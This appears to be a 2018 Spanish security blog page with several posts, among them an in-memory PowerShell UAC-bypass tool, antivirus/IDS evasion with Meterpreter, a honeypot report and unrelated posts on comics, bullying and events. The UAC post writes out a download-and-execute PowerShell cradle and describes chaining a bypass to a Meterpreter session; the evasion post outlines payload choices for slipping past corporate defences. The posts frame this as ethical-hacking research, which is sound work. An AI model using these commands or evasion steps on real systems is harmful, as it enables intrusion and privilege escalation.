miércoles, octubre 31, 2018

UAC-A-Mola^2 Evolution

Cuando Santiago Hernández y yo comenzamos a trabajar en UAC-A-Mola veíamos claro el objetivo. Una nueva herramienta que permitiera investigar en nuevos bypasses, detectar y explotar bypasses de UAC conocidos para aplicar seguridad en la mitigación de éstos en un entorno corporativo. Pero, sobre todo, lo comentado al principio, es decir, una herramienta de investigación.

Figura 1: UAC-A-Mola^2 Evolution

Tras diez meses desde la publicación de la herramienta no hemos avanzado todo lo que nos hubiera gustado en ella, pero había algo que si teníamos claro y es el convertir a UAC-A-Mola en algo más ligero o con menor dependencia y que pudiera ser utilizado directamente desde memoria enfocándola a un uso mayor en el Ethical Hacking. Eso sí, sin perder su naturaleza de investigación.

La idea era crear código Powershell que pudiera ser cargado en memoria y poder trabajar con él como si trabajásemos con UAC-A-Mola. Tras un análisis posterior, me di cuenta que quizá sería interesante no disponer de un modo interactivo pensando en poder ejecutarlo desde una Powershell en un Meterpreter.


Lo primero era utilizar la base de iBombshell y poder ejecutar un pequeño UAC-A-Mola en memoria. Decidí crear dos modos diferentes: un modo interactivo a modo de consola y otro segundo modo que funcionaría con parámetros ejecutaría el proceso y finalizaría la ejecución. Este segundo modo fue pensado viendo su utilización con un Meterpreter de Metasploit y la extensión de Powershell de ésta.


La nueva herramienta fue presentada en la 8dot8 de Chile donde hablamos de UAC-A-Mola y de cómo ha evolucionado hasta ver el nacimiento de este cliente ligero, el cual es ejecutado en memoria y proporciona dos modos de funcionamiento.

El código no es muy grande, aunque tiene dos partes diferenciadas, el modo de ejecución interactivo del modo normal. En este artículo hablaremos del modo normal de ejecución e iremos situando diferentes entornos.

Figura 4: UAC-a-Mola thin client

Como se puede ver en la imagen, una vez que se carga la función y es ejecutada ésta muestra las posibilidades que ofrece. Lo importante aquí es que uacamola_tc no debe estar descargado en ningún lugar, si no que la función es descargada en el instante y directamente a la memoria del equipo, sea el equipo del pentester o el equipo comprometido. Para ello, se debe ejecutar la instrucción:
 iex(new-object net.webclient).downloadstring([direcciónFunción])
La idea es hacer igual que con iBombshell, es decir, disponer de la función en un repositorio de Github, en este caso será el repositorio de UAC-A-Mola, y solicitar la función cuando sea necesaria. Ésta irá directamente a memoria, sin pasar por disco.

Figura 5: Repositorio de UAC-a-Mola

La configuración de la herramienta será sencilla, disponemos de una opción –list que nos muestra los módulos disponibles y las opciones de estos módulos. Por ejemplo, si queremos descargar el módulo de bypass UAC con el método del eventvwr, o también conocido como Fileless, deberemos configurarle con sus opciones.

Figura 6: uac-a-mola thin client -list

Hay que notar que los módulos implementados deben ser capaces de recibir opciones. Estas opciones son pasadas en el tipo de datos Hashtable de Powershell. En otras palabras, toda función de uacamola_tc debe recibir un parámetro que será un objeto Hashtable llamado $Options. En este Hashtable habrá pares clave-valor. Este tipo de pares son las opciones que cada función utilizará y que los creadores de las funciones deben definir.

Por ejemplo, la función buac_eventvwr puede recibir un $Options con dos claves: nodefault e instruction. También, ya que así fue implementado, puede funcionar sin parámetros, es decir, si recibe un Hashtable vacío tendrá una ejecución por defecto. En este caso, realiza un bypass de UAC y crea un fichero en C:\, ruta donde sin privilegio no se podría escribir, por lo que el bypass ha funcionado.

Figura 7: UAC-a-Mola thin client -module

Como vemos en la siguiente imagen, si en vez de pasar un Hashtable vacío, le indicamos las claves que venían en la ayuda del módulo, cuando ejecutábamos el parámetro list, se configura el módulo como nosotros queremos realmente ejecutarlo.

En este caso, se realizará un bypass de UAC sobre la máquina y, además, se ejecutará una Powershell que realizará una conexión contra el módulo web_delivery de Metasploit y se descargará, también en memoria, un Meterpreter y se conseguirá una sesión de éste en Metasploit corriendo sobre nuestro Kali Linux.

Figura 8: Configuración del módulo para explotación de shell

A continuación, se puede ver la sesión que se obtiene de Meterpreter gracias al bypass de UAC. Hay que decir que hasta aquí todo se hace localmente, desde la máquina Windows y esta parte es de investigación o prueba, ya que un bypass de UAC en un Ethical Hacking se realizará desde una shell remota.

Figura 9: Sesión Meterpreter conseguida en nuestro Metasploit sobre Kali Linux

Ahora, con una sesión de Meterpreter que tengamos sin privilegio, pero en la que el usuario del proceso comprometido pertenece al grupo de administradores, vamos a realizar un ejemplo de uso de uacamola_tc en modo no interactivo. Lo primero sería cargar la extensión de Powershell en memoria y poder interactuar con Powershell en el Meterpreter.

Figura 10: Shell de Powershell en Metasploit

Como se puede ver, una vez cargada la función remotamente de uacamola_tc se puede observar que está en el provider de funciones cargadas en memoria. Hay que notar que aunque en el ejemplo pongamos la dirección IP 10.0.0.1, cuando se libere la herramienta habrá que indicar el repositorio de Github adecuado.

Figura 11: Bypass con uacamola_tc

Luego ejecutamos una instrucción cómo hicimos anteriormente, es una instrucción larga, pero eficaz. Provocará el bypass de UAC y, posteriormente, ejecutará un nuevo Meterpreter ya con privilegios. De momento UAC-A-Mola TC (o thin client) no está disponible en el repositorio de Github de ElevenPaths, pero pronto lo estará y podrá ser utilizado como una pequeña herramienta para trabajar en memoria con el UAC en un Ethical Hacking. Más adelante, hablaremos del modo interactivo de la herramienta.

Figura 12: PoC de UAC-a-mola thin client

Además, os dejo un video del funcionamiento de la herramienta dentro de una Powershell generada en una sesión de Meterpreter utilizando UAC-a-mola thin client.

Autor: Pablo González Pérez (@pablogonzalezpe), escritor de los libros "Metasploit para Pentesters", "Hacking con Metasploit: Advance Pentesting" "Hacking Windows", "Ethical Hacking", "Got Root" y “Pentesting con Powershell”, Microsoft MVP en Seguridad y Security Researcher en el equipo de "Ideas Locas" de la unidad CDO de Telefónica.

martes, octubre 30, 2018

0xWord Comics: Armatura Tomo I

No hace falta que os diga que soy un amante de los cómics. Me encantaría haber sabido dibujar mejor y poder ser un dibujante de cómics, como Salvador Larroca o como Arthur Adams, o Jan, o muchos de los ídolos que tengo en el mundo de los dibujos con bocadillos y onomatopeyas. Pero no doy mucho más que mis No Lusers, así que tengo que saciar mis anhelos en este mundo de otra forma. Y lo hago con incursiones en este mundo desde otro punto de acción. Lo hago editando cómics desde 0xWord.
Comenzamos con esta locura de hacer cómics incorporando a Cálico Electrónico dentro de 0xWord, donde editamos unas tiras de prensa, además de publicar un cómic con Ediciones Babylon del que guardo algunos de los originales. Después hicimos una publicación del cómic de Hacker Épico en una edición Deluxe con unos dibujos fantásticos de Eve Mae que se disfrutan a tamaño grande. Queríamos hacer un cómic en una edición que se disfrutase cuando lo tenías en las manos.
Y desde hoy tenemos la línea 0xWord Cómics donde iremos publicando colecciones de aquello que nos vaya dando el presupuesto, ya que este negocio de los cómics es de lo menos sostenible - si no eres Marvel o DC -, y en primer lugar hemos adquirido los derechos de los cómics de la Fundación Jerry Finger, por lo que podréis disfrutar de las aventuras de Armatura y La Élite en cómics que irán saliendo con el ritmo con el que los podamos sacar.

Figura 3: Una página entintada de Armatura Tomo I

Para los que no conozcáis la historia, en 1942 durante la Edad de Oro del cómic Jerry Finger creó un personaje distinto a los héroes más conocidos de esa época. La diferencia radicaba en que contaba la historia no de un personaje sino de un objeto a la que llamó "The Armatura".

Figura 4: Página de Armatura Tomo I

Su éxito fue casi inmediato hasta la crisis de los cómics de 1954 (motivada por la publicación del libro "Seduction of the Innocent" -"La seducción de los inocentes" - de Fredric Wertham) y el odio que el editor Nemanthias Smith le tenía, obligó a muchas series a ser canceladas acusadas de pervertir las mentes de los niños.

Figura 5: Página de Armatura Tomo I entintada

Con 33 años Jerry puso fin a su vida suicidándose sin volver a ver su serie publicada. Los problemas económicos, el abandono de su mujer, y el poco reconocimiento que tenía por parte de la industria que le acusaba de no haberse adaptado a los nuevos tiempos, le llevó a tal dramática decisión. Una pelea de derechos entre los herederos de Jerry (la conocida como Jerry´s War) durante más de 40 años ha tenido a varias generaciones sin poder conocer al personaje.

Figura 6: Portada original de Armatura Uno, incluido en Armatura Tomo I

En 2006, Apuf Entertaiment se hizo con los derechos y comienza una batalla para poder traer de nuevo las historias. Por fin, en 2016 se editan los episodios de "Armatura Uno" que traen de vuelta un personaje evolucionado a nuevos tiempos pero que no pierde su esencia y donde nos cuentan de manera divertida y amena sus aventuras.

Figura 7: Aventuras de Armatura Tomo I

Ahora, 0xWord Cómics ha llegado a un acuerdo para poder seguir manteniendo vivos estos personajes, estas aventuras, y el espíritu de los que amamos los tebeos de superhéroes, así que aquí va Armatura Tomo I, con las 128 primeras páginas de impactantes dibujos con de las aventuras de estos héroes. Para que lo disfrutes si sigues sintiéndote un niño como yo cuando tengo un tebeo en las manos.

Saludos Malignos!

lunes, octubre 29, 2018

Tapa la webcam de ese reloj y ese sistema de seguridad en tus alquileres

La historia que ha contado una pareja tras haber alquilado una casa en AirBnB y que he leído esta semana, a pesar de que sucedió en Septiembre, es algo que no es nuevo. Un piso o una habitación de alquiler, o en un hotel, en el que se graba a una pareja en su intimidad manteniendo relaciones sexuales. En Trainspoitting 2 - que puedes ver en Movistar + -, el mítico "Sick Boy" se gana la vida haciendo algo similar a lo que se cuenta en esta historia.

Figura 1: Tapa la webcam de ese reloj y ese sistema de seguridad en tus alquileres

Se trata de ocultar una webcam en algún dispositivo, en este caso, como se puede ver en la foto que aportaron los protagonistas de la historia, en un teléfono digital que miraba directamente hacia la cama en la que dormían los inquilinos de esa casa de AirBnB.

Figura 2: El reloj con al webcam incrustada en él

Lo cierto es que esta preocupación es algo muy común cuando viajas por todo el mundo. Cuando alquilas habitaciones, pisos o vas a hoteles. Y ya hemos visto casos en los que incluso los vecinos hackeaban las cámaras del ordenador, las cámaras de los sistemas de vídeo vigilancia o incluso el propio técnico de ordenadores que te instala un software de vigilancia.


Figura 3: Vídeo de la noticia

En mi caso, no es la primera vez que tapo una cámara de seguridad que está dentro de una habitación en la que estoy de alquiler. Y me he acordado de esta foto en la que "colgué" sobre la cámara de vigilancia mi zapatilla roja con la suela gastada del monopatín.


Al final, cuando hay una cámara nunca sabes si está mirando o no, y lo peor, quién está al otro lado de la cámara, así que yo tapo todas las que puedo.

Saludos Malignos!

sábado, octubre 27, 2018

El experimento del HoneyPot en Internet de @elevenpaths: SIP & SSH under attack

Nuestros compañeros de la unidad de ciberseguridad de ElevenPaths tienen siempre un oído en la red. Nuestro servicio de CyberThreats se basa precisamente en eso, en saber qué es lo que está pasando en Internet para poder ayudar a nuestros clientes a tener algo de anticipación ante las posibles amenazas y ataques.

Figura 1: El experimento del HoneyPot en Internet: SIP & SSH under attack

Entre las cosas que se hacen en la unidad, existen proyectos de HoneyPotting, es decir, de poner servidores falsos con herramientas de "deception" o engaño, que se dejan atacar para ver qué es lo que se está explotando o probando en Internet.  Los últimos resultados, solo como forma de hacer una actualización y puesta al día los han publicado en un informe que puedes obtener y leer en SlideShare.


Entre lo más destaco, es digno de resaltar los siguientes puntos que han publicado en el blog de ElevenPaths como resumen del informe total.
  • SIP es un protocolo muy abusado en la red. Se buscan servidores vulnerables para atacar o realizar ataques a través de ellos. La herramienta más utilizada para conseguirlo es SIP Vicious, detectable por su user-agent "friendly-scanner" y con el método OPTIONS. Las direcciones IP vienen principalmente de Francia. 
  • SSH, con más de 36.000 peticiones (2.560 direcciones únicas), es el protocolo del que más tráfico se ha recibido con diferencia. Estados Unidos lidera la lista de países de origen del tráfico SSH recibido. Le sigue China y a menor distancia Holanda, Vietnam, India, Francia y Rusia. 
  • En los ataques contra servidores SSH, no se está buscando un ataque por fuerza bruta que agote por completo un diccionario de contraseñas habituales. Lo que los atacantes de este servicio buscan es el servicio mal configurado o por defecto, probando un puñado de combinaciones de contraseñas y usuarios conocidos.
  • Los usuarios intentados más repetidos son ‘root’ y ‘admin’ son, con diferencia, seguidos a distancia por ‘user’ y ‘pi’, ‘test’, ‘ubnt’, ‘guest’ o ‘ftpuser’. 
  • El tráfico restante lo componen protocolos comunes: DNS, HTTP, SNMP y algunos curiosos para Internet como DHCP.
Llaman la atención los ataques a sistemas de VoIP, algo que en muchas empresas quizá no se le presta todavía la atención necesaria. De hecho, muchos de los ataques SIP están enunciados en el informe son ampliamente conocidos y están descritos al detalle en el libro que escribió José Luis Verdeguer a.k.a. "pepelux" sobre Hacking y Seguridad VoIP.

Figura 3: Ataque SIPvicious y huella en hnneypot

Otro de los puntos destacados ha sido la cantidad de ataques SSH de todo tipo, desde ataques de Default Passwords, ataques de fuerza bruta, y, como no, actividad que en algún caso pudiera ser incluso relativa a la pruebas con el bug de Libssh del que os hablamos en el blog de ElevenPaths. La recomendación es que si tienes un servicio SSH te leas este artículo de My SSH en Paranoid Mode donde te damos algunos consejos para poner medidas de protección extra contra este tipo de vulnerabilidades en el futuro. En el libro de Hardening GNU/Linux también tienes recomendaciones para fortificar el sistema completo en caso de ser un servidor basado en kernel Linux.

Figura 4: User_Agents bots SSH

Los User-Agents de los bots más utilizados los tenéis en una tabla, y en el informe podéis ver qué tecnologías de bots se utilizan más a menudo, destacando el uso de Python como lenguaje más utilizado.

Figura 5: Ataques de países por direcciones IP

Por último, desatar la "ciberparanoia", hemos analizado la procedencia de los ataques, y aunque la mayor parte de los ataques proceden de USA, si se clasifican por direcciones únicas, el gráfico pone a China en cabeza. Pero eso no quiere decir nada, o puede decir algo, o mucho, o solo es un intento de suplantar y simular algo...o quién sabe.

Figura 6: Security Innovation Day 2018

Si quieres saber más cosas, recuerda que el próximo 7 de Noviembre en Madrid tienes una cita con todo el equipo de ElevenPaths en nuestro evento por excelencia, el Security Innovation Day. Reserva tu plaza cuanto antes.

Saludos Malignos!

viernes, octubre 26, 2018

Eventos de aquí a Halloween @0xWord @LUCA_d3

Desde hoy hasta que llegue la noche del 31 de Octubre, donde pienso disfrazarme de algo terrorífico para hacer felices a Mi Hacker y Mi Survivor, hay una serie de eventos que hoy os dejo por aquí.

Figura 1: Eventos de aquí a Halloween

Antes de comenzar con la lista de eventos para los próximos días, recordad que mañana aún queda una jornada de la SecAdmin en Sevilla donde podéis adquirir los libros de 0xWord y ahorraros los gastos de envío, y la jornada BitUp en Alicante, donde también están los libros de 0xWord disponibles.

Y después, los eventos que tenemos no son muchos - son solo tres días laborales, pero alguno que otro tenemos, toma nota.
En primer lugar os traigo una nueva LUCA Talk que harán nuestros compañeros de LUCA para explicar cuáles son los roles profesionales en el mundo del Big Data. Si quieres conocer cuáles son las oportunidades laborales en este sector, seguro que te ayuda. Será una sesión Online y puedes apuntarte en la web de registro.

Figura 4: LUCA Talk "Roles profesionales en el mundo del Big Data"

En segundo lugar un evento especial en Londres centrado en el mundo de las empresas de telecomunicaciones Total Telecom, en el que hablará Enrique Blanco nuestro Global CTIO de Telefónica y nuestro compañero en LUCA, el Dr. Richard Benjamins Chief AI Ambassador, que hablarán de la evolución de las redes y del uso de AI. Tienes más info en la web del evento.

Figura 5: Total Telecom Congress en Londres

El día 31, en Las Palmas de Gran Canarias hay otro evento de Ciberseguridad donde hablará Igor Lukic - responsable de la distribución de libros de 0xWord en las Islas Canarias y con quien puedes hablar allí por si quieres conseguir alguno de nuestros libros -. El evento se centra en temas de ciberseguridad nacional, y tiene una agenda muy completa. En la web tienes toda la info.

Figura 6: TACS en Islas Canarias

Por último, el mismo día de la noche de Halloween dará comienzo un nuevo Curso Online Profesional de Hacking Ético orientado a formar profesionales que se incorporen en el mundo laboral para trabar como pentesters - no te olvides echar tu CV en nuestros ElevenPaths Professional Services -. Además, de tener 180 horas de formación, los asistentes recibirán los libros de Ethical Hacking y Metasploit para pentesters. Y podrás hacer también el curso en en Versión VBook de Ethical Hacking de 0xWord. Tienes todo el detalle en la web del curso.

Figura 7: Curso Online Profesional de de Hacking Ético

Y esto es todo, que aunque sea una semana "corta" también tenemos actividades por si te quieres sumar a alguna. Ahora a disfrutar el fin de semana.

Saludos Malignos!

jueves, octubre 25, 2018

Colaboradores Pasivos de Abusones en Redes Sociales

Si hay algo que llevo mal son los abusones. Los que humillan a otros por hacerse el gracioso burlándose de sus defectos. Los que insultan a la gente y dicen que es que son “sinceros” u “honestos” o que ejercen su "libertad de expresión" para decir lo que piensan, mientras que lo único que hacen es atacar a personas, dañar psicológicamente a una persona, y a lo que significa de verdad la "liberta de expresión". No me gusta nada la gente que públicamente maltrata verbalmente o con actos a otra persona. La gente no se mueve por la calle empujando a otros y molestando, transmitir una idea no necesita que sea dañando a la gente. Lo repudio.

Figura 1: Colaboradores Pasivos de Abusones en Redes Sociales

De pequeño fui un niño con sobrepeso. Con la cara redonda y sonrosada. Estudioso. Me presentaba a subir nota si sacaba menos de un ocho. Y era, como os podéis imaginar, blanco de muchas burlas, motes e insultos. De todo tipo. Y no me gustaba nada. Me sentía humillado. Me sentía descolocado en el mundo.

Aprendí muchas cosas de la vida y de la gente. Aprendí a sobrevivir. Aprendí a defenderme. Por las malas. Como no se deben aprender las cosas. Sufriendo. Mucho. Hubo días en los que no quería salir de casa. Hubo días en los que no quería ir a la escuela o el instituto. Y tuve que aprender a sobrevivir.

Con los años todo aquello pasó, pero siempre llevé dentro esos recuerdos. Sin rencor. Sin personalización de todo aquello en alguna persona en concreto. Tengo buenos amigos entre aquellos que en algún momento estuvieron en el otro lado. Alguno no. Hoy ya no dejo que nada de aquello me afecte en lo más mínimo. Superarlo fue duro. Me hizo fuerte, aunque odio tener que haberlo pasado y que alguien lo pueda ver como algo positivo. No, no lo fue.

¿Pero por qué os cuento todo esto ahora?

Pues porque he vuelto al colegio, no directamente, sino a través de mis hijas. A través de Mi Hacker y Mi Survivor. Y tengo que educarlas. Por supuesto para que no acepten como normal nada que sea anormal, pero también para que no sean cómplices pasivos de los abusones.

Los Cómplices Pasivos de los Abusones los conocéis. Son los que se ríen de las gracias de los abusones, o los que no se las tienen en cuenta. Los que invitan a un cumpleaños al abusón después de que haya pegado o insultado injustamente a otra persona. Los que sin decir nada, se callan cuando una persona está sufriendo un insulto, un mote, un memé abusivo, una humillación en un grupo de WhatsApp, o en una red social como Twitter o Facebook. Los que lo ven solo como una broma sin pensar que la otra persona está sufriendo.

Muchos padres no quieren que sus hijos sean víctimas de abusones. Y les educan para defenderse. Otra gran mayoría tampoco quiere que sus hijos sean abusones, y toman medidas para ello. Y otro grupo, entre los que me encuentro yo, no queremos que nuestros hijos sean colaboradores pasivos de abusones.

Mi hija mayor, con ocho años, un día me habló de “Los Pobres”, suponiendo en su mente que hay personas que eran de nacimiento o por destino “Pobres”, y tuve que explicarle que las personas son personas y están en situaciones pasándole bien económica o pasándolo mal, pero todo puede cambiar.

Para que ella lo entendiera en primera persona, me la llevé a un restaurante a servir comida a la gente que vive en la calle en Madrid. Les tuvo que poner la mesa, servir la comida, recoger los cacharros, poner las bebidas y limpiar el restaurante. Con mis compañeros "Voluntarios de Telefónica" que le ayudaron, y me ayudaron a que pudiera educar a mi hija un poco. Y entendió que todos somos personas iguales, con distinta situación económica por cosas de la vida.

Con respecto a los abusones, que se ha topado con malas situaciones, burlas y conflictos así en sus pocos años en la escuela y en la vida, tiene ciertas normas que no puede incumplir. En el colegio tiene prohibido reírse de las bromas de los abusones. Tiene prohibido hacer bromas a los compañeros por ser gordo, alto, bajo, tener granos, suspender mucho, ser pelirrojo o cualquier otra absurdez que los abusones utilizan para intentar suplir sus carencias, miedos y vergüenzas atacando a otros. Tiene prohibido ser amigo de abusones.

Y yo hago lo mismo en la vida y en las redes sociales.

Por eso en Twitter dejo de seguir y bloqueo a cualquiera que insulta a otra persona. De hecho, cuando alguien quiere entrar a trabajar en mi equipo cercano o me pide ayuda, pregunto referencias a gente de la que me fie, reviso lo que publica en redes sociales como Twitter o Facebook para ver qué tipo de persona es. Retiro mi amistad a quién me ataca en redes sociales, grupos de Telegram, WhatsApp, listas de correos, o demás. Algunos de ellos han perdido mi amistad sin saber por qué, ya que creen que cuando se meten con alguien en un grupo de Telegram o WhatsApp la persona atacada no se va a enterar. Pobres necios...

Pero aún más, si alguien al que sigo en Twitter le veo insultar a otra persona, lo dejo de seguir ipso-facto, y a veces ayudo a la persona atacada por detrás. De hecho, yo dejo de seguir también a esos que se mofan, ríen o disfrutan del ataque de un abusón a una persona de forma pública. E incluso a gente que sigue a abusones. No pienso ser un "Colaborador pasivo de los abusones en las redes sociales" de ninguna forma. Quiero dar un ejemplo a mis hijas aplicándome lo mismo que les digo que tienen que hacer con los abusones.

Creo que como sociedad hemos dejado durante mucho tiempo que los abusones tomen control de las redes sociales, como Twitter, los grupos de WhatsApp, los grupos de Telegram, Facebook o Instagram, siendo Colaboradores Pasivos de los Abusones en RRSS, y que debemos avanzar como sociedad. Hemos dejado que la gente se sienta "orgullosa" de ser "hater", y yo no pienso ser parte de eso. Creo que debemos sacar lo mejor de las redes sociales – que a mí personalmente me han dado mucho -, y eliminar lo que hace daño a nuestra sociedad, a nuestras comunidades, a la tecnología que creamos para mejorar nuestras vidas.

Saludos Malignos!

PD: Si estás sufriendo una situación similar, lucha por salir. Pide ayuda. No aceptes como normales cosas que no lo son. No estás sol@.

miércoles, octubre 24, 2018

6º Security Innovation Day: The Game Is Never Over

El próximo 7 de Noviembre llega una cita muy especial para nosotros en ElevenPaths. Llega la 6ª Edición el evento que nos marcó los primeros deadlines en la construcción de productos y servicios en ElevenPaths, allá por el año 2013 cuando hicimos el primer evento. Y seguimos manteniendo el mismo espíritu: El Security Innovation Day.

Figura 1: 6º Security Innovation Day: The Game Is Never Over

Cinco años después, en el mismo Auditorio del Edificio Central en el Distrito C de Telefónica, nos volveremos a subir al escenario en horario de tarde para contaros las cosas en las que hemos estado trabajando este año y anunciaros las novedades de ElevenPaths.

Figura 2: Primera parte de la agenda del SID 2018

En la agenda de este año estarán caras conocidas por todos, ya que llevamos mucho tiempo en este proyecto. Estará Pedro Pablo Pérez que es el CEO de ElevenPaths, Julia Perea que es la responsable de Seguridad Digital en Telefónica de España, nuestro compañero Alberto Sempere que es responsable de producto en ElevenPaths, estará Sergio de los Santos que es responsable del laboratorio de innovación de ElevenPaths y también Gonzalo Álvarez Marañón, que se ha unido a nuestro proyecto recientemente, y estaré yo dando la charla de cierre, entre otros, que aún habrá algún pequeño cambio en la agenda.

Figura 3: Segunda parte de la agenda del SID 2018

Lo más novedoso este año es que hemos reservado suficiente tiempo en el café para probar nuestras tecnologías en una serie de booths que hemos montado en la zona de café, donde podrás tocar los productos, charlar con los ingenieros, los compañeros de Telefónica y de ElevenPaths, darnos sugerencias y tener un contacto mayor con todo lo que hacemos.
Como siempre, haremos el evento en horario de tarde para que lo puedan seguir por streaming nuestros amigos de latinoamérica, pero si no puedes venirte, seas de dónde seas, hemos habilitado un enlace para el registro por streaming.
Si quieres venir, regístrate cuanto antes, que las plazas son muy limitadas y todos los años tenemos que cerrar el registro con mucha anticipación, así que no dejes pasar más tiempo y rellena el formulario con tus datos para que podamos guardarte tu sitio.

Saludos Malignos!

martes, octubre 23, 2018

LUCA: (Big) Data Storytelling Revolution @luca_d3

No aplicar las infinitas posibilidades que ofrecen los datos y las técnicas de BigData a la toma de decisiones en la empresa es un error grave a la hora enfocar los esfuerzos de una organización. En la unidad LUCA se construyen productos y servicios que ayudan a nuestros clientes a realizar esa transformación del negocio usando datos.

Figura 1: LUCA: (Big) Data Storytelling Revolution

A lo largo de los últimos meses desde LUCA han ido compartiendo algunas experiencias a diferentes niveles en forma de vídeos que van publicando en su canal Youtube. Hoy os recojo los últimos que han puesto disponibles en los que se habla de todo esto. Son una buena forma de entender mejor en qué consiste la que se llamó "(Big) Data Revolution".


Figura 2: Data Storytelling

El primero de los vídeos que os he dejado aquí corresponde a una LUCA Talk en la que nuestra compañera Paloma Recuero nos explica cómo nuestros datos pueden ser fundamentales para construir un buen "Data Storytelling" de esas que os recolectamos en nuestra web que ayude a entender la realidad y transformar la toma de decisiones.


Figura 3: LUCA Transit en la ciudad de Lima (Perú)

Un ejemplo de esto ha sido cómo con datos, y utilizando nuestro producto LUCA Transit que ha sido construido sobre la plataforma SmartSteps, se ha ayudado a mejorar la toma de decisiones en la construcción y ampliación de estaciones de Metro en la ciudad de Lima (Perú), una de las cincuenta ciudades más pobladas del mundo.

Figura 4: LUCA Transit en la ciudad de Stuttgart (Alemania)

Soluciones similares con LUCA Transit se hicieron para ayudar a la planificación del transporte público en las ciudades alemanas de Stuttgart y en la ciudad de Hamburgo, donde con los datos se pudieron tomar mejores decisiones para invertir los recursos económicos de las ciudades. Pero también en otros países, como el plan de autopistas de Highways England.

Figura 5: LUCA Transit para el Metro de Quito

En otras ubicaciones, LUCA Transit ha sido utilizado para ayudar en la planificación del transporte en las ciudades de Neuquen (Argentina), del Metro de Quito (Ecuador) o en la Ciudad de Cali en Colombia.


Figura 6: LUCA Store en el Centro Comercial La Vaguada (Madrid)

Otra de las historias que os contamos fue la del Centro Comercial de La Vaguada de Madrid, y cómo utilizando la solución de LUCA Store había podido tomar mejores decisiones al poder entender mejor el tipo y la procedencia de cada uno de los visitantes a sus instalaciones.

Figura 7: LUCA Tourism en Reina Sofía

En casos similares se han utilizado los datos de movimientos a zonas especificas para crear mejores soluciones de Turismo, como se hizo en el caso del Turismo en Brasil, o como en una zona más específica se construyó una solución para entender los visitantes del Museo Reina Sofía de Madrid.

El número de historias que pueden contar tus datos es mucho mayor del que probablemente puedas imaginar antes de entrar en esta "Big Data Storytelling Revolution".

Figura 8: Más de 150 proyectos, más de 150 historias

En la unidad LUCA vamos recogiendo las historias que hemos ido construyendo usando datos procedentes de la red, de los dispositivos IoT que implantamos, de los datos generados por nuestros propios clientes, etc... para que puedas entender mejor, con más de 40 diferentes historias seleccionadas de entre los más de 150 proyectos que hemos hecho ya, en qué consiste tomar Data-Driven Decisions.

Saludos Malignos!

lunes, octubre 22, 2018

Evadiendo el AV/IDS con Powershell: Fun with Flags! (wrong!) Fun with Meterpreter!

He podido disfrutar de unas pequeñas vacaciones y mientras uno tiene horas de avión puede aprovechar para pensar en cosas. En ocasiones las cosas en las que se piensan son la parte de hobby de la que para muchos de nosotros es también nuestro trabajo. En esas horas de avión pensé en varias cosas, quizá algunas las veáis en un tiempo, pero también hay oportunidad de leer. A mí me gusta leer cosas sobre mis pasiones tecnológicas como son el Ethical Hacking, Powershell, Metasploit, Payloads avanzados, evasión, y un largo etcétera de conceptos y técnicas que son de mi interés.

Figura 1: Evadiendo el AV/IDS con Powershell: Fun with Flags! (wrong!) Fun with Meterpreter!

De lo que hoy voy a hablar no es una técnica nueva, ni mucho menos, ya que la podemos encontrar hace dos años, pero este tipo de técnicas o "tricks" que van saliendo son la forma de evasión de los elementos de seguridad. En algunas ocasiones, la gente piensa que la evasión es perpetua y se debe entender que es la caza del gato y el ratón, tal y como ocurre con el malware y los antivirus o los exploits y las soluciones de protección ante ejecución de código. En este artículo se habla de esta técnica, la cual es bastante interesante para entender el juego del gato y del ratón en este ámbito.

Figura 2: AV/IDS Evasion with Powershell

Lo normal, es encontrar una gran cantidad de información sobre evasión de antivirus para la parte del stager, por ejemplo, técnicas de codificación, cifrado o, incluso, realizando la compilación de una versión propia del ejecutable que contiene la shellcode. Esto es relativamente sencillo hoy en día con Python, Ruby, generar macros VBA o, incluso, crear un pequeño código en Powershell.

De lo que uno encuentra menos son artículos o posts centrados en la evasión de soluciones de seguridad como un IDS o un IPS. Si analizamos dónde ocurre la acción hay que entender que el proceso del stager ocurre en memoria y el stager es inyectado en ella. Es decir, todo ocurre en la memoria, por lo que los antivirussufren’ más para poder hacer algo. La DLL que se inyecta no tocará el disco. Sobre técnicas de evasión escribimos Borja Merino y yo en el libro de Hacking con Metasploit de 0xWord.

¿Qué ocurre en un entorno corporativo?

Aquí tenemos más soluciones de seguridad. Podemos encontrar un IDS, un IPS, un Proxy Web que analice el tráfico, etcétera. Aquí la evasión puede ser más costosa. Esta es una lista de elementos de seguridad que hay que tener en cuenta en un entorno corporativo:
• Proxy web con interceptación SSL (Bridging HTTP-s)
• IPS (Intrusion Prevention System)
• IDS (Intrusion Detection System)
• Antivirus en hosts (Servers & endpoints)
Al menos, esto sería algo normal, básico en un entorno. Los canales TLS/SSL no valdrían según el esquema anterior, porque se tiene la capacidad de ver el contenido de la comunicación. El antivirus en los hosts e, incluso, en el Proxy permitiría analizar parte o totalidad del tráfico. Los IDS/IPS con firmas conocidas o asociadas al Meterpreter.

Figura 3: Esquema de seguridad en entorno corporativo

Entonces tenemos un objetivo claro, evadir esto. Lo cual puede no ser sencillo y debemos entender que es un problema temporal, puede haber técnicas de evasión que funcionen bien en un momento determinado o contra unas soluciones determinadas. Pero es temporal, ya que es el juego del gato y el ratón. En un momento determinado hay una técnica que permite evadir diferentes mecanismos, pero cuando se conoce, los proveedores pondrán mitigación para solventar este hecho. Así de forma iterativa.

El objetivo y el desafío

El objetivo está claro, como he dicho, es evadir estos mecanismos para lograr la comunicación y ejecución del stager. El desafío podemos verlo en diferentes puntos. El stager utilizará el Proxy en caso de que haya un Proxy en la organización. Para ello, debe poder detectarlo y utilizar el que esté configurado en la máquina. El stager debe ser ofuscado de tal forma que evite al AV, al IDS y la detección del Proxy.

Metasploit proporciona una serie de payloads que son compatibles con lo que se necesita. Ofrece varias. Una que se puede utilizar en estos escenarios es meterpreter/reverse_winhttp. Este Meterpreter permite utilizar el Proxy del sistema, utilizar las credenciales del Proxy y poder ofuscar el código con stage_encoder.

Figura 4: Libro de Metasploit para Pentesters 4ª Edición & Hacking con Metasploit en 0xWord

Antes de continuar, una aclaración con Meterpreter. Hay que recordar que Meterpreter es un payload de Metasploit, el cual es ejecutado en una máquina a través de un stager de tamaño pequeño. Éste se ejecuta en el equipo y se establece una comunicación con la máquina del atacante para descargar un stage payload, el cual será una DLL que es cargada en memoria y ejecutada a través de la técnica Reflective DLL.

